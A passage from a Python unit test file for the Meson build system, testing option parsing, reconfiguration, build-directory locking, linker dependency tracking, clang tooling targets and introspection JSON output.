testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '173 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '182 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('WARNING: target links against shared modules. This is not '
'recommended as it is not supported on some platforms')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'static')
self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
self.assertEqual(obj.options[OptionKey('set_sub_opt')].value, True)
self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
else:
self.assertIn('as both', str(cm.exception))
self.init(testdir)
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
else:
self.assertIn('as both', str(cm.exception))
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('default_library')].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
msg = "Option 'foo' must have a value separated by equals sign."
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.init(testdir, extra_args=['-Dfoo'])
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn(msg, cm.exception.output)
else:
self.assertIn(msg, str(cm.exception))
self.init(testdir)
with self.assertRaises((subprocess.CalledProcessError, RuntimeError)) as cm:
self.setconf('-Dfoo')
if isinstance(cm.exception, subprocess.CalledProcessError):
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn(msg, cm.exception.output)
else:
self.assertIn(msg, str(cm.exception))
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('subp_opt', 'subp')].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('set_percent_opt')].value, 'myoption%')
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar',
'-Db_lundef=false', '--fatal-meson-warnings'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('bindir')].value, 'bar')
self.assertEqual(obj.options[OptionKey('buildtype')].value, 'release')
self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'thread')
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('bindir')].value, 'foo')
self.assertEqual(obj.options[OptionKey('buildtype')].value, 'plain')
self.assertEqual(obj.options[OptionKey('b_sanitize')].value, 'address')
self.assertEqual(obj.options[OptionKey('args', lang='c')].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '208 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.options[OptionKey('warning_level')].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['optimization'], '0')
self.setconf('-Doptimization=g')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['optimization'], 'g')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '158 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '34 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '41 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '44 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '99 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
{
'descriptive_name': 'subsub',
'name': 'subsub',
'version': 'undefined'
},
{
'descriptive_name': 'subsubsub',
'name': 'subsubsub',
'version': 'undefined'
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '43 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '76 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '76 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
dummydir = os.path.join(testdir, 'dummydir.h')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
self.assertNotIn(dummydir, out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
# XXX: These now generate in a different order, is that okay?
self.assertListEqual(sorted(res_nb, key=lambda x: x['name']), sorted(res_wb, key=lambda x: x['name']))
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_buildoptions_cross_only(self):
testdir = os.path.join(self.unit_test_dir, '84 cross only introspect')
testfile = os.path.join(testdir, 'meson.build')
res = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
optnames = [o['name'] for o in res]
self.assertIn('c_args', optnames)
self.assertNotIn('build.c_args', optnames)
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj, strict: bool = True):
for i in key_type_list:
if isinstance(i[1], (list, tuple)) and None in i[1]:
i = (i[0], tuple([x for x in i[1] if x is not None]))
if i[0] not in obj or obj[i[0]] is None:
continue
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
if strict:
for k in obj.keys():
found = False
for i in key_type_list:
if k == i[0]:
found = True
break
self.assertTrue(found, 'Key "{}" not in expected list'.format(k))
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
('depends', list),
('workdir', (str, None)),
('priority', int),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
('choices', (list, None)),
('value', (str, int, bool, list)),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('extra_files', list),
('subproject', (str, None)),
('install_filename', (list, None)),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Match target ids to input and output files for ease of reference
src_to_id = {}
out_to_id = {}
for i in res['targets']:
print(json.dump(i, sys.stdout))
out_to_id.update({os.path.relpath(out, self.builddir): i['id']
for out in i['filename']})
for group in i['target_sources']:
src_to_id.update({os.path.relpath(src, testdir): i['id']
for src in group['sources']})
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
deps_to_find = {'test case 1': [src_to_id['t1.cpp']],
'test case 2': [src_to_id['t2.cpp'], src_to_id['t3.cpp']],
'benchmark 1': [out_to_id['file2'], src_to_id['t3.cpp']]}
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertEqual(sorted(i['depends']),
sorted(deps_to_find[i['name']]))
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i, strict=False)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
